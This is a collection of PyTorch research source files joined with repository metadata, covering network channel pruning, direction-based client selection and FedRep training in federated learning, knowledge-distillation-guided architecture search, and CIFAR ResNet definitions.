m1.running_mean = m0.running_mean[idx1.tolist()].clone()
m1.running_var = m0.running_var[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask.clone()
if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC
end_mask = cfg_mask[layer_id_in_cfg]
elif isinstance(m0, nn.Conv2d):
if torch.sum(end_mask) == 0:
continue
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask.cpu().numpy())))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask.cpu().numpy())))
# random set for test
# new_end_mask = np.asarray(end_mask.cpu().numpy())
# new_end_mask = np.append(new_end_mask[int(len(new_end_mask)/2):], new_end_mask[:int(len(new_end_mask)/2)])
# idx1 = np.squeeze(np.argwhere(new_end_mask))
# print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
if idx0.size == 1:
idx0 = np.resize(idx0, (1,))
if idx1.size == 1:
idx1 = np.resize(idx1, (1,))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
elif isinstance(m0, nn.Linear):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask.cpu().numpy())))
if idx0.size == 1:
idx0 = np.resize(idx0, (1,))
m1.weight.data = m0.weight.data[:, idx0].clone()
m1.bias.data = m0.bias.data.clone()
return newmodel
#
# def check_score(newmodel, train_loader):
#
# newmodel.K = np.zeros((args.test_batch_size, args.test_batch_size))
# def counting_forward_hook(module, inp, out):
# try:
# if not module.visited_backwards:
# return
# if isinstance(inp, tuple):
# inp = inp[0]
# inp = inp.view(inp.size(0), -1)
# x = (inp > 0).float()
# K = x @ x.t()
# K2 = (1. - x) @ (1. - x.t())
# newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy()
# except:
# pass
#
# def counting_backward_hook(module, inp, out):
# module.visited_backwards = True
#
# for name, module in newmodel.named_modules():
# if 'ReLU' in str(type(module)):
# # hooks[name] = module.register_forward_hook(counting_hook)
# module.register_forward_hook(counting_forward_hook)
# module.register_backward_hook(counting_backward_hook)
#
# newmodel = newmodel.to(device)
# s = []
#
# for j in range(5):
# data_iterator = iter(train_loader)
# x, target = next(data_iterator)
# x2 = torch.clone(x)
# x2 = x2.to(device)
# x, target = x.to(device), target.to(device)
# jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device)
# newmodel(x2.to(device))
# s_, ld = np.linalg.slogdet(newmodel.K)
# s.append(ld)
# score = np.mean(s)
# return score
if args.cuda:
model.cuda()
def pruning(model):
total = 0
cfg = []
cfg_mask = []
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
total += m.weight.data.shape[0]
bn = torch.zeros(total)
index = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
size = m.weight.data.shape[0]
bn[index:(index+size)] = m.weight.data.abs().clone()
index += size
y, i = torch.sort(bn)
thre_index = int(total * args.percent)
thre = y[thre_index]
# print('Pruning threshold: {}'.format(thre))
mask = torch.zeros(total)
index = 0
for k, m in enumerate(model.modules()):
if isinstance(m, nn.BatchNorm2d):
size = m.weight.data.numel()
weight_copy = m.weight.data.abs().clone()
_mask = weight_copy.gt(thre.cuda()).float().cuda()
cfg_mask.append(_mask.clone())
if int(torch.sum(_mask)) > 0:
cfg.append(int(torch.sum(_mask)))
mask[index:(index+size)] = _mask.view(-1)
# print('layer index: {:d} \t total channel: {:d} \t remaining channel: {:d}'.format(k, _mask.shape[0], int(torch.sum(_mask))))
index += size
elif isinstance(m, nn.MaxPool2d):
cfg.append('M')
# print('Pre-processing Successful!')
return mask, cfg, cfg_mask
resume = args.save + '/model_best.pth.tar'
print('==> resumeing from model_best ...')
checkpoint = torch.load(resume)
best_epoch = checkpoint['epoch']
print('best epoch: ', best_epoch)
model.load_state_dict(checkpoint['state_dict'])
best_mask, best_cfg, best_mask_cfg = pruning(model)
size = best_mask.size(0)
# resume = args.save_1 + '/model_best.pth.tar'
# resume = args.save_1 + '/ckpt159.pth.tar'
# print('==> resumeing from model_best ...')
# checkpoint = torch.load(resume)
# best_epoch = checkpoint['epoch']
# print('best epoch: ', best_epoch)
# model.load_state_dict(checkpoint['state_dict'])
# best_mask_1 = pruning(model)
# print('overlap rate of two best model: ', float(torch.sum(best_mask==best_mask_1)) / size)
epochs = args.end_epoch - args.start_epoch + 1
overlap = np.zeros((epochs, epochs))
save_dir = os.path.join(args.save, 'overlap_'+str(args.percent))
masks = []
for i in range(args.start_epoch, args.end_epoch+1):
resume = args.save + '/ckpt' + str(i-1) + '.pth.tar'
checkpoint = torch.load(resume)
model.load_state_dict(checkpoint['state_dict'])
masks.append(pruning(model))
# for i in range(args.start_epoch, args.end_epoch+1):
# for j in range(args.start_epoch, args.end_epoch+1):
# overlap[i-1, j-1] = float(torch.sum(masks[i-1] == masks[j-1])) / size
# print('overlap[{}, {}] = {}'.format(i-1, j-1, overlap[i-1, j-1]))
#
# np.save(save_dir, overlap)
wandb_project = 'pruning_score'
name = 'trail'
# wandb.init(project=wandb_project, name=name)
best_info = {}
best_score = 0
bird = [15, 25, 40, 159]
xshape = (1, 3, 32, 32)
flops_original, param_origianl = get_model_infos(model, xshape)
for i in range(args.start_epoch, args.end_epoch):
model_new = create_model(model, masks[i][1], masks[i][2])
score = check_score(model_new, train_loader)
flop, param = get_model_infos(model_new, xshape)
info_dict = {
'epoch': i,
'score': score,
'cfg': masks[i][1],
'cfg_mask': masks[i][2],
'flop_pruning_rate': flop/flops_original,
'param_pruning_rate': param/param_origianl,
}
# wandb.log(info_dict)
print(score)
if score > best_score:
best_score = score
best_info = info_dict
if i in bird:
print(i, flop/flops_original, param/param_origianl, score)
np.save('{}-{:.2f}.npy'.format(i, best_score), info_dict)
``` |
{
"source": "Joey61Liuyi/flsim",
"score": 3
} |
#### File: flsim/server/directed.py
```python
import logging
from server import Server
import numpy as np
from threading import Thread
class DirectedServer(Server):
"""Federated learning server that uses profiles to direct during selection."""
# Run federated learning
def run(self):
# Perform profiling on all clients
self.profiling()
# Continue federated learning
super().run()
# Federated learning phases
def selection(self):
import fl_model # pylint: disable=import-error
clients = self.clients
clients_per_round = self.config.clients.per_round
profiles = self.profiles
w_previous = self.w_previous
# Extract directors from profiles
directors = [d for _, d in profiles]
# Extract most recent model weights
w_current = self.flatten_weights(fl_model.extract_weights(self.model))
model_direction = w_current - w_previous
# Normalize model direction
model_direction = model_direction / \
np.sqrt(np.dot(model_direction, model_direction))
# Update previous model weights
self.w_previous = w_current
# Generate client director scores (closer direction is better)
scores = [np.dot(director, model_direction) for director in directors]
# Apply punishment for repeatedly selected clients
p = self.punishment
scores = [x * (0.9)**p[i] for i, x in enumerate(scores)]
# Select clients with highest scores
sample_clients_index = []
for _ in range(clients_per_round):
top_score_index = scores.index(max(scores))
sample_clients_index.append(top_score_index)
# Overwrite to avoid reselection
scores[top_score_index] = min(scores) - 1
# Extract selected sample clients
sample_clients = [clients[i] for i in sample_clients_index]
# Update punishment factors
self.punishment = [
p[i] + 1 if i in sample_clients_index else 0 for i in range(len(clients))]
return sample_clients
def profiling(self):
import fl_model # pylint: disable=import-error
# Use all clients for profiling
clients = self.clients
# Configure clients for training
self.configuration(clients)
# Train on clients to generate profile weights
threads = [Thread(target=client.train) for client in self.clients]
[t.start() for t in threads]
[t.join() for t in threads]
# Recieve client reports
reports = self.reporting(clients)
# Extract weights from reports
weights = [report.weights for report in reports]
weights = [self.flatten_weights(weight) for weight in weights]
# Extract initial model weights
w0 = self.flatten_weights(fl_model.extract_weights(self.model))
# Save as initial previous model weights
self.w_previous = w0.copy()
# Update initial model using results of profiling
# Perform weight aggregation
logging.info('Aggregating updates')
updated_weights = self.aggregation(reports)
# Load updated weights
fl_model.load_weights(self.model, updated_weights)
# Calculate direction vectors (directors)
directors = [(w - w0) for w in weights]
# Normalize directors to unit length
directors = [d / np.sqrt(np.dot(d, d)) for d in directors]
# Initialize punishment factors
self.punishment = [0 for _ in range(len(clients))]
# Use directors for client profiles
self.profiles = [(client, directors[i])
for i, client in enumerate(clients)]
return self.profiles
``` |
{
"source": "Joey61Liuyi/PFL-Non-IID",
"score": 2
} |
#### File: flcore/servers/serverfedrep.py
```python
import wandb
from flcore.clients.clientfedrep import clientFedRep
from flcore.servers.serverbase import Server
from utils.data_utils import read_client_data
from threading import Thread
import torch
import torchvision.transforms as transforms
import torchvision
import numpy as np
class FedRep(Server):
def __init__(self, device, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, time_threthold, run_name):
super().__init__(dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal,
time_threthold, run_name)
# select slow clients
self.set_slow_clients()
for i, train_slow, send_slow in zip(range(self.num_clients), self.train_slow_clients, self.send_slow_clients):
# train, test = read_client_data(dataset, i)
client = clientFedRep(device, i, train_slow, send_slow, self.train_all[i], self.test_all[i], model, batch_size, learning_rate, local_steps)
self.clients.append(client)
del(self.train_all)
del(self.test_all)
print(f"\nJoin clients / total clients: {self.join_clients} / {self.num_clients}")
print("Finished creating server and clients.")
def train(self):
for i in range(self.start_epoch, self.global_rounds+1):
print(f"\n-------------Round number: {i}-------------")
self.send_models()
if i<self.global_rounds/2:
eval_gap = 50
elif i< self.global_rounds*95/100 and i>=self.global_rounds/2:
eval_gap = 20
else:
eval_gap = 1
if i%eval_gap == 0:
print("\nEvaluate global model")
test_acc, train_acc, train_loss, personalized_acc = self.evaluate(i)
info_dict = {
"learning_rate": self.clients[0].optimizer.state_dict()['param_groups'][0]['lr'],
"global_valid_top1_acc": test_acc*100,
"average_valid_top1_acc": personalized_acc*100,
"epoch": i
}
# print(info_dict)
wandb.log(info_dict)
self.selected_clients = self.clients
for client in self.clients:
# client.scheduler.update(i, 0.0)
client.train()
# threads = [Thread(target=client.train)
# for client in self.selected_clients]
# [t.start() for t in threads]
# [t.join() for t in threads]
self.receive_models()
self.aggregate_parameters()
if i % 100 == 0:
self.save_global_model_middle(i)
print("\nBest global results.")
self.print_(max(self.rs_test_acc), max(
self.rs_train_acc), min(self.rs_train_loss), personalized_acc)
self.save_results()
self.save_global_model()
``` |
{
"source": "Joey61Liuyi/TAS",
"score": 2
} |
#### File: exps/algos/Block_wise_TANAS.py
```python
import sys, time, random, argparse
from copy import deepcopy
import torch
from pathlib import Path
import numpy as np
import torch.nn as nn
import math
import os
import torch.nn.init as init
import torch.nn.functional as F
import warnings
warnings.filterwarnings("ignore")
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from config_utils import load_config, dict2config
from datasets import get_datasets, get_nas_search_loaders
from procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
get_optim_scheduler,
)
from utils import get_model_infos, obtain_accuracy
from log_utils import AverageMeter, time_string, convert_secs2time
from models import get_cell_based_tiny_net, get_search_spaces
from nas_201_api import NASBench201API as API
from models import create_cnn_model, count_parameters_in_MB
def search_func_modified(xloader,
teacher_model,
network,
student_model,
criterion,
scheduler,
w_optimizer,
a_optimizer,
epoch_str,
print_freq,
logger,
):
teacher_model.eval()
student_model.eval()
data_time, batch_time = AverageMeter(), AverageMeter()
base_losses, base_top1, base_top5 = AverageMeter(), AverageMeter(), AverageMeter()
arch_losses, arch_top1, arch_top5 = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
T = 5
lambda_ = 0.5
for step, (base_inputs, base_targets, arch_inputs, arch_targets) in enumerate(
xloader
):
scheduler.update(None, 1.0 * step / len(xloader))
base_targets = base_targets.cuda(non_blocking=True)
arch_targets = arch_targets.cuda(non_blocking=True)
# measure data loading time
data_time.update(time.time() - end)
network.train()
w_optimizer.zero_grad()
_, logits = network(base_inputs.cuda())
logits_teacher = teacher_model(base_inputs.cuda())
logits_student = student_model(base_inputs.cuda())
loss_KD_TA = T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_teacher / T, dim=1))
loss_KD_TA+= T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_student / T, dim=1))
base_loss = (1 - lambda_) * criterion(logits, base_targets) + lambda_ * loss_KD_TA
base_loss.backward()
torch.nn.utils.clip_grad_norm_(network.parameters(), 5)
w_optimizer.step()
# record
base_prec1, base_prec5 = obtain_accuracy(
logits.data, base_targets.data, topk=(1, 5)
)
base_losses.update(base_loss.item(), base_inputs.size(0))
base_top1.update(base_prec1.item(), base_inputs.size(0))
base_top5.update(base_prec5.item(), base_inputs.size(0))
# update the architecture-weight
a_optimizer.zero_grad()
_, logits = network(arch_inputs.cuda())
logits_teacher = teacher_model(arch_inputs.cuda())
logits_student = student_model(arch_inputs.cuda())
loss_KD_TA = T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_teacher / T, dim=1))
loss_KD_TA += T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_student / T, dim=1))
arch_loss = (1 - lambda_) * criterion(logits, arch_targets) + lambda_ * loss_KD_TA
arch_loss.backward()
a_optimizer.step()
# record
arch_prec1, arch_prec5 = obtain_accuracy(
logits.data, arch_targets.data, topk=(1, 5)
)
arch_losses.update(arch_loss.item(), arch_inputs.size(0))
arch_top1.update(arch_prec1.item(), arch_inputs.size(0))
arch_top5.update(arch_prec5.item(), arch_inputs.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % print_freq == 0 or step + 1 == len(xloader):
Sstr = (
"*SEARCH* "
+ time_string()
+ " [{:}][{:03d}/{:03d}]".format(epoch_str, step, len(xloader))
)
Tstr = "Time {batch_time.val:.2f} ({batch_time.avg:.2f}) Data {data_time.val:.2f} ({data_time.avg:.2f})".format(
batch_time=batch_time, data_time=data_time
)
Wstr = "Base [Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})]".format(
loss=base_losses, top1=base_top1, top5=base_top5
)
Astr = "Arch [Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})]".format(
loss=arch_losses, top1=arch_top1, top5=arch_top5
)
logger.log(Sstr + " " + Tstr + " " + Wstr + " " + Astr)
return base_losses.avg, base_top1.avg, base_top5.avg, arch_losses.avg, arch_top1.avg, arch_top5.avg
def main(xargs):
assert torch.cuda.is_available(), "CUDA is not available."
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
torch.set_num_threads(xargs.workers)
prepare_seed(xargs.rand_seed)
logger = prepare_logger(args)
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, xargs.data_path, -1
)
# config_path = 'configs/nas-benchmark/algos/GDAS.config'
config = load_config(
xargs.config_path, {"class_num": class_num, "xshape": xshape}, logger
)
search_loader, _, valid_loader = get_nas_search_loaders(
train_data,
valid_data,
xargs.dataset,
"../../configs/nas-benchmark",
config.batch_size,
xargs.workers,
)
teacher_model = xargs.teacher_model
TA = xargs.TA
student = xargs.student_model
teacher_checkpoint = xargs.teacher_checkpoint
student_checkpoint = xargs.student_checkpoint
epoch_online = xargs.epoch_online
logger.log(
"||||||| {:10s} ||||||| Search-Loader-Num={:}, batch size={:}".format(
xargs.dataset, len(search_loader), config.batch_size
)
)
logger.log("||||||| {:10s} ||||||| Config={:}".format(xargs.dataset, config))
search_space = get_search_spaces("cell", xargs.search_space_name)
if xargs.model_config is None:
model_config = dict2config(
{
"name": "GDAS",
"C": xargs.channel,
"N": xargs.num_cells,
"max_nodes": xargs.max_nodes,
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": bool(xargs.track_running_stats),
},
None,
)
else:
model_config = load_config(
xargs.model_config,
{
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": bool(xargs.track_running_stats),
},
None,
)
search_model = get_cell_based_tiny_net(model_config)
logger.log("search-model :\n{:}".format(search_model))
logger.log("model-config : {:}".format(model_config))
student_accuracy = {'best': -1}
TA_accuracy = {'best': -1}
w_optimizer, w_scheduler, criterion = get_optim_scheduler(
search_model.get_weights(), config
)
a_optimizer = torch.optim.Adam(
search_model.get_alphas(),
lr=xargs.arch_learning_rate,
betas=(0.5, 0.999),
weight_decay=xargs.arch_weight_decay,
)
logger.log("w-optimizer : {:}".format(w_optimizer))
logger.log("a-optimizer : {:}".format(a_optimizer))
logger.log("w-scheduler : {:}".format(w_scheduler))
logger.log("criterion : {:}".format(criterion))
flop, param = get_model_infos(search_model, xshape)
logger.log("FLOP = {:.2f} M, Params = {:.2f} MB".format(flop, param))
logger.log("search-space [{:} ops] : {:}".format(len(search_space), search_space))
if xargs.arch_nas_dataset is None:
api = None
else:
api = API(xargs.arch_nas_dataset)
logger.log("{:} create API = {:} done".format(time_string(), api))
last_info, model_base_path, model_best_path = (
logger.path("info"),
logger.path("model"),
logger.path("best"),
)
network, criterion = torch.nn.DataParallel(search_model).cuda(), criterion.cuda()
if last_info.exists(): # automatically resume from previous checkpoint
logger.log(
"=> loading checkpoint of the last-info '{:}' start".format(last_info)
)
last_info = torch.load(last_info)
start_epoch = last_info["epoch"]
checkpoint = torch.load(last_info["last_checkpoint"])
genotypes = checkpoint["genotypes"]
valid_accuracies = checkpoint["valid_accuracies"]
search_model.load_state_dict(checkpoint["search_model"])
w_scheduler.load_state_dict(checkpoint["w_scheduler"])
w_optimizer.load_state_dict(checkpoint["w_optimizer"])
a_optimizer.load_state_dict(checkpoint["a_optimizer"])
logger.log(
"=> loading checkpoint of the last-info '{:}' start with {:}-th epoch.".format(
last_info, start_epoch
)
)
else:
logger.log("=> do not find the last-info file : {:}".format(last_info))
start_epoch, valid_accuracies, genotypes = (
0,
{"best": -1},
{-1: search_model.genotype()},
)
# start training
start_time, search_time, epoch_time, total_epoch = (
time.time(),
AverageMeter(),
AverageMeter(),
config.epochs + config.warmup,
)
teacher_model, teacher_optimizer, teacher_scheduler = create_cnn_model(teacher_model, train_data, total_epoch, teacher_checkpoint, use_cuda=1)
# if teacher_checkpoint:
# teacher_model = load_checkpoint(teacher_model, teacher_checkpoint)
# else:
# teacher_model = train_teacher(search_loader, teacher_model, criterion, teacher_optimizer, logger, total_epoch, xargs.teacher_model)
# if TA:
student_model, student_optimizer, student_scheduler = create_cnn_model(student, train_data, total_epoch, student_checkpoint, use_cuda=1)
# if student_checkpoint:
# student_model = load_checkpoint(student_model, student_checkpoint)
# checkpoint = torch.load(student_checkpoint)
# student_optimizer.load_state_dict(checkpoint['optimizer'])
# if TA != 'GDAS':
# network, w_optimizer = create_cnn_model(TA, train_data, use_cuda=1)
# # w_optimizer = torch.optim.Adam(network .parameters(), lr=0.025, betas=(0.5, 0.999), weight_decay=1e-4)
# a_optimizer = None
for epoch in range(start_epoch, total_epoch):
w_scheduler.update(epoch, 0.0)
need_time = "Time Left: {:}".format(
convert_secs2time(epoch_time.val * (total_epoch - epoch), True)
)
epoch_str = "{:03d}-{:03d}".format(epoch, total_epoch)
search_model.set_tau(
xargs.tau_max - (xargs.tau_max - xargs.tau_min) * epoch / (total_epoch - 1)
)
logger.log(
"\n[Search the {:}-th epoch] {:}, tau={:}, LR={:}".format(
epoch_str, need_time, search_model.get_tau(), min(w_scheduler.get_lr())
)
)
search_w_loss, search_w_top1, search_w_top5, valid_a_loss, valid_a_top1, valid_a_top5 = search_func_modified(
search_loader,
teacher_model,
network,
student_model,
criterion,
w_scheduler,
w_optimizer,
a_optimizer,
epoch_str,
xargs.print_freq,
logger,
)
# else:
# Student_optimizer = None
# training_mode = 0
# search_w_loss, search_w_top1, search_w_top5, valid_a_loss, valid_a_top1, valid_a_top5, student_loss, student_top1, student_top5 = search_func(search_loader,
# teacher_model,
# network,
# student_model,
# criterion,
# w_scheduler,
# w_optimizer,
# a_optimizer,
# Student_optimizer,
search_time.update(time.time() - start_time)
logger.log(
"[{:}] searching : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%, time-cost={:.1f} s".format(
epoch_str, search_w_loss, search_w_top1, search_w_top5, search_time.sum
)
)
logger.log(
"[{:}] evaluate : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%".format(
epoch_str, valid_a_loss, valid_a_top1, valid_a_top5
)
)
# logger.log(
# "[{:}] student : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%".format(
# epoch_str, student_loss, student_top1, student_top5
# )
# )
# check the best accuracy
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
TA_accuracy[epoch] = search_w_top1
if search_w_top1 > TA_accuracy['best']:
TA_accuracy['best'] = search_w_top1
valid_accuracies[epoch] = valid_a_top1
if valid_a_top1 > valid_accuracies["best"]:
valid_accuracies["best"] = valid_a_top1
genotypes["best"] = search_model.genotype()
find_best = True
else:
find_best = False
genotypes[epoch] = search_model.genotype()
logger.log(
"<<<--->>> The {:}-th epoch : {:}".format(epoch_str, genotypes[epoch])
)
# save checkpoint
save_path = save_checkpoint(
{
"epoch": epoch + 1,
"args": deepcopy(xargs),
"search_model": search_model.state_dict(),
"w_optimizer": w_optimizer.state_dict(),
"a_optimizer": a_optimizer.state_dict(),
"w_scheduler": w_scheduler.state_dict(),
"genotypes": genotypes,
"valid_accuracies": valid_accuracies,
},
model_base_path,
logger,
)
last_info = save_checkpoint(
{
"epoch": epoch + 1,
"args": deepcopy(args),
"last_checkpoint": save_path,
},
logger.path("info"),
logger,
)
if find_best:
logger.log(
"<<<--->>> The {:}-th epoch : find the highest validation accuracy : {:.2f}%.".format(
epoch_str, valid_a_top1
)
)
copy_checkpoint(model_base_path, model_best_path, logger)
with torch.no_grad():
logger.log("{:}".format(search_model.show_alphas()))
if api is not None:
logger.log("{:}".format(api.query_by_arch(genotypes[epoch], "200")))
# measure elapsed time
epoch_time.update(time.time() - start_time)
start_time = time.time()
# if TA!='GDAS':
# student_model, student_optimizer = create_cnn_model(student, train_data, use_cuda=1)
#
# student_best = -1
# for epoch in range(start_epoch, total_epoch):
# student_loss, student_top1, student_top5 = train_student(search_loader,
# network,
# student_model,
# criterion,
# student_optimizer,
# epoch_str,
# xargs.print_freq,
# logger,)
#
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
logger.log("\n" + "-" * 100)
# check the performance from the architecture dataset
logger.log(
"GDAS : run {:} epochs, cost {:.1f} s, last-geno is {:}.".format(
total_epoch, search_time.sum, genotypes[epoch - 1]
)
)
if api is not None:
logger.log("{:}".format(api.query_by_arch(genotypes[epoch - 1], "200")))
logger.log('----------------')
logger.log('we used {:} as our Teacher with param size {:}'.format(xargs.teacher_model, count_parameters_in_MB(teacher_model)))
logger.log('we used {:} as our TA with param size {:}'.format(TA, count_parameters_in_MB(network)))
logger.log('we used {:} as our Student with param size {:}'.format(xargs.student_model, count_parameters_in_MB(student_model)))
logger.log('we used {:} online epochs out of total epochs of {:}'.format(xargs.epoch_online, total_epoch))
logger.log('The best ACC of TA: {:.2f}%'.format(TA_accuracy['best']))
logger.log('The best ACC of Student: {:.2f}%'.format(student_accuracy['best']))
logger.log('----------------')
logger.close()
# else:
# if student:
# student_model, student_optimizer = create_cnn_model(student, train_data, use_cuda=1)
# student_best = -1
# for epoch in range(start_epoch, total_epoch):
# epoch_str = "{:03d}-{:03d}".format(epoch, total_epoch)
# student_loss, student_top1, student_top5 = train_student(search_loader,
# teacher_model,
# student_model,
# criterion,
# student_optimizer,
# epoch_str,
# xargs.print_freq,
# logger, )
#
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
#
# logger.log('----------------')
# logger.log('we used {:} as our Teacher with param size {:}'.format(xargs.teacher_model, count_parameters_in_MB(teacher_model)))
# logger.log('we used {:} as our TA with param size {:}'.format(TA, count_parameters_in_MB(network)))
# logger.log('we used {:} as our Student with param size {:}'.format(xargs.student_model, count_parameters_in_MB(student_model)))
# logger.log('we used {:} online epochs out of total epochs of {:}'.format(xargs.epoch_online, total_epoch))
# logger.log('The best ACC of : {:.2f}%'.format(TA_accuracy['best']))
# logger.log('The best ACC of Student: {:.2f}%'.format(student_accuracy['best']))
# logger.log('----------------')
# logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("GDAS")
parser.add_argument("--data_path", default='../../data', type=str, help="Path to dataset")
parser.add_argument(
"--dataset",
type=str,
default= 'cifar100',
choices=["cifar10", "cifar100", "ImageNet16-120"],
help="Choose between Cifar10/100 and ImageNet-16.",
)
# channels and number-of-cells
parser.add_argument("--search_space_name", default='darts', type=str, help="The search space name.")
parser.add_argument("--max_nodes", type=int, help="The maximum number of nodes.")
parser.add_argument("--channel", type=int, help="The number"
" of channels.")
parser.add_argument(
"--num_cells", type=int, help="The number of cells in one "
"。stage."
)
parser.add_argument(
"--track_running_stats",
type=int,
default=1,
choices=[0, 1],
help="Whether use track_running_stats or not in the BN layer.",
)
parser.add_argument(
"--config_path", default='../../configs/search-opts/GDAS-NASNet-CIFAR.config', type=str, help="The path of the configuration."
)
parser.add_argument(
"--model_config",
default='../../configs/search-archs/GDAS-NASNet-CIFAR.config',
type=str,
help="The path of the model configuration. When this arg is set, it will cover max_nodes / channels / num_cells.",
)
# architecture leraning rate
parser.add_argument(
"--arch_learning_rate",
type=float,
default=3e-4,
help="learning rate for arch encoding",
)
parser.add_argument(
"--arch_weight_decay",
type=float,
default=1e-3,
help="weight decay for arch encoding",
)
parser.add_argument("--tau_min", default=10, type=float, help="The minimum tau for Gumbel")
parser.add_argument("--tau_max", default=0.1, type=float, help="The maximum tau for Gumbel")
# log
parser.add_argument(
"--workers",
type=int,
default=4,
help="number of data loading workers (default: 2)",
)
parser.add_argument(
"--save_dir", default='./output/search-cell-dar/GDAS-cifar10-BN1', type=str, help="Folder to save checkpoints and log."
)
parser.add_argument(
"--arch_nas_dataset",
type=str,
help="The path to load the architecture dataset (tiny-nas-benchmark).",
)
parser.add_argument("--print_freq", default=200, type=int, help="print frequency (default: 200)")
parser.add_argument("--rand_seed", default= -1, type=int, help="manual seed")
parser.add_argument("--teacher_model", default="vgg19", type=str, help="type of teacher mode")
parser.add_argument("--TA", default='GDAS', type=str, help="type of TA")
parser.add_argument("--student_model", default='lenet', type=str, help="type of student mode")
parser.add_argument("--teacher_checkpoint", default='../output/nas-infer/cifar10-BS96-gdas_serached/checkpoint/seed-71956-bestNone_vgg19_68.08%_07-19,06.pth', type=str, help="teacher mode's check point")
parser.add_argument("--student_checkpoint", default='../output/nas-infer/cifar10-BS96-gdas_serached/checkpoint/seed-62735-bestNone_lenet_33.10%_07-20,01.pth', type=str,
help="student mode's check point")
parser.add_argument("--epoch_online", default=250, type=int, help="online training of TA and student")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = 99999
# #
# #
# teacher_models = ['resnet110', 'resnet56', 'resnet44', 'resnet32', 'resnet26', 'resnet20', 'resnet14', 'resnet8', 'plane10', 'plane8', 'plane 6','plane4','plane2' ]
# teacher_models = ['vgg16']
# for one in teacher_models:
# args.teacher_model = one
# TA_models = ['plane4', 'plane6', 'resnet26', 'resnet20']
# for one in TA_models:
# args.TA = one
main(args)
```
#### File: lib/models/addtional_models.py
```python
import numpy as np
import torch.nn as nn
import torch
import torch.nn.functional as F
import math
from torch.optim.lr_scheduler import _LRScheduler
class_num = 10
class ExponentialLR(_LRScheduler):
def __init__(self, optimizer, end_lr, num_iter, last_epoch=-1):
self.end_lr = end_lr
self.num_iter = num_iter
super(ExponentialLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
curr_iter = self.last_epoch
r = curr_iter / self.num_iter
return [base_lr * (self.end_lr / base_lr) ** r for base_lr in self.base_lrs]
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
class ResNet(nn.Module):
def __init__(self, depth, num_classes=100, block_name='BasicBlock'):
super(ResNet, self).__init__()
# Model type specifies number of layers for CIFAR-10 model
if block_name.lower() == 'basicblock':
assert (depth - 2) % 6 == 0, 'When use basicblock, depth should be 6n+2, e.g. 20, 32, 44, 56, 110, 1202'
n = (depth - 2) // 6
block = BasicBlock
elif block_name.lower() == 'bottleneck':
assert (depth - 2) % 9 == 0, 'When use bottleneck, depth should be 9n+2, e.g. 20, 29, 47, 56, 110, 1199'
n = (depth - 2) // 9
block = Bottleneck
else:
raise ValueError('block_name shoule be Basicblock or Bottleneck')
self.inplanes = 16
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 16, n)
self.layer2 = self._make_layer(block, 32, n, stride=2)
self.layer3 = self._make_layer(block, 64, n, stride=2)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
